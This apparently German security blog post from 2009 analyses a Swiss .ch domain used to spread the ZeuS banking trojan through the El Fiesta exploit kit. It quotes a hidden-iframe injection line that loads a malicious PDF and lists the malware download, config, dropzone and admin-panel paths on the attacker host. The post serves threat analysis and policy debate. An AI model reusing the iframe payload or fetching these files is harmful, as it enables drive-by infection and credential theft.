Monthly Archive for March, 2009

Page 2 of 2

.CH Domain verbreitet ZeuS-Trojaner

Auch die schweizer Top Level Domain (kurz TLD) .ch wird nicht davor verschont, für die gezielte Verbreitung des ZeuS-Trojaners (aka wsnpoem / zbot) missbraucht zu werden. Ein gutes Beispiel dafür ist die Domain toureg-cwo.ch:

whois: This information is subject to an Acceptable Use Policy.
See http://www.switch.ch/id/terms/aup.html

Domain name:
toureg-cwo.ch

Holder of domain name:
Tikhomirov Nikita
Gilyarovskogo street bld.65 apt.41

RU-129110 Moscow
Russian Federation
Contractual Language: German

Technical contact:
Tikhomirov Nikita
Gilyarovskogo street bld.65 apt.41

RU-129110 Moscow
Russian Federation

Name servers:
ns1.everydns.net
ns2.everydns.net

Die Domain wurde bei SWITCH registriert, welche für die schweizer TLD .ch zuständig ist. Laut Whois ist die Domain auf einen Tikhomirov Nikita aus Moskau (Russland) registriert. Interessant ist, dass als Kontakt Sprache jedoch Deutsch angegeben ist:

Contractual Language: German

So weit so gut – schauen wir uns einmal an, was die Webseite denn so zu bieten hat:

toureg-cwo-ch

Das einzige, was wir zu sehen bekommen, ist eine Standard-Page mit der Information, dass noch kein Inhalt auf den Server geladen wurde. Was wir auch sehen, ist ein Datum welches angibt, wann die Seite erstellt wurde:

Date Created: Wed Feb 25 06:06:21 2009

Wer bereits schon einmal eine typische ZeuS-Domain gesehen hat weiss, dass viele dieser Domains eine solche Standard-Page wie oben gezeigt verwenden.

Im Server-Verzeichnis fta finden wir das Exploit-Toolkit El Fiesta, welches immer wieder verwendet wird, um dem Besucher durch Drive-By exploits über ungepatchte Sicherheitslücken im Web-Browser sowie anderen Anwendungen (z.B. Adobe Reader und Adobe Flash Player) den ZeuS Trojaner oder andere Malware unterzujubeln. In dem Beispiel hier ist der Adobe Reader die Zielscheibe:

[…]
document.write(“<\iframe src='http://toureg-cwo.ch/fta/pdf.php?id=1552‘ width=1 height=1 frameborder=0><\/iframe>“);
[…]

Dabei wird ein PDF an den Browser gesendet, welches versucht, eine Lücke im Adobe Reader auszunutzen:

Filename: 1.pdf
File size: 7398 bytes
MD5…: 35a45ec077ded26a6087cf01bd2d6b90
SHA1..: 7c04f364085c29461c94d8d6416724d00a3c4374
Erkennungsrate: 11/39 (28.21%)

Ist das ausnützten der Schwachstelle erfolgreich, wird der ZeuS-Trojaner auf dem System des Besuchers installiert, welcher in diesem Fall Login-Informationen von Online-Diensten wie z.B. Myspace aber auch zu Online-Banking Accounts ausspioniert und an eine dropzone (C&C) sendet:

http://toureg-cwo.ch/zs/ldr.exe

Filename: ldr.exe
File size: 69120 bytes
MD5…: f4445e12309f491ed0780234d74f8c92
SHA1..: 897b1588ee84909972a38489f9c246eba2ad65ea
Erkennungsrate: 11/39 (28.21%)

Wie man gut erkennen kann, befindet sich die ZeuS Installation im Server-Verzeichnis “zs”:

Trojaner-Binary: toureg-cwo.ch/zs/ldr.exe
Config-File: toureg-cwo.ch/zs/cfg.bin
Dropzone: toureg-cwo.ch/zs/s.php
ZeuS Admin Panel: toureg-cwo.ch/zs/in.php

Was mich an dieser Stelle beruhigt ist die Tatsache, dass laut El Fiesta Statistik die Domain hauptsächlich dazu verwendet wird, Besucher aus Grossbritannien zu infizieren:

fiesta_toureg-cwo-ch

Nun Fragt sich, wie eine Domain wie diese rasch möglichst offline genommen werden kann. Viele stellen sich dies jedoch einfacher vor, als es tatsächlich ist. Die Domain toureg-cwo.ch ist zwar in der Schweiz registriert, wird jedoch in China bei der China Telecom (CHINANET) gehostet:

;; QUESTION SECTION:
;toureg-cwo.ch. IN A

;; ANSWER SECTION:
toureg-cwo.ch. 3600 IN A 61.139.126.236

inetnum: 61.139.0.0 – 61.139.127.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: Data Communication Division
descr: China Telecom
country: CN

Wer bereits einmal einen Blick die Statistik des ZeuS Trackers geworfen hat weiss, dass China Telecom in den Top ten ZeuS hosters auftaucht:

chinanet_zeus

Die Chancen, den entsprechenden Server bei der China Telecom herunter zu nehmen, sind also relativ schlecht. Eine weitere Möglichkeit wäre, die Domain direkt beim Registrar (SWITCH) löschen zu lassen. Das Problem: Die gesetzlichen Grundlagen dazu geben nicht immer eine eindeutige Antwort darauf, wann SWITCH eine Löschung einer Domain vornehmen darf oder gar muss, wenn Hinweise auf illegale Inhalte vorliegen. Ausserdem waren bisher die Anforderungen an die Überprüfung der Identität des Domäneninhabers minimal, um eine sofortige Aktivierung neuer Domänen zu ermöglichen. Was diesen Punkt betrifft, so stehen in Kürze gesetzliche Änderungen an; deren Wirksamkeit muss sich aber erst weisen. Es liegt auf der Hand, dass die Überprüfung einer Adresse in Russland schwierig, aufwendig und kostenintensiv ist und daher nicht im komerziellen Interesse von SWITCH liegen kann. Daher sind stichhaltige und eindeutige gesetzlichen Grundlagen essentiell, wofür das Schweizerische Bundesamt für Kommunikation (BAKOM) zuständig ist.

Fazit
Die Erkenntnis, dass die Domain zwar für Illegale Zwecke verwendet wird und die Marke “Schweiz” trägt (TLD .ch), wir jedoch aus Sicht des Gesetzes nichts dagegen machen können, ist vielen ein Dorn im Auge. Die Schweiz hat hier ganz klar Nachholbedarf. Es ist wichtig, dass wir als Schweiz den Kriminellen in solchen Fällen ein ganz klares Signal senden: Bei uns nicht! Ansonsten droht der Schweiz Top Level Domain .ch das selbe Schicksal wie z.B. der TLD .biz, .info, .ru und .cn, welche zu Haufen für Illegale Zwecke Registriert und Missbraucht werden (Siehe 1, 2, 3 und 4).




economics-recluse
Scene
Urgent!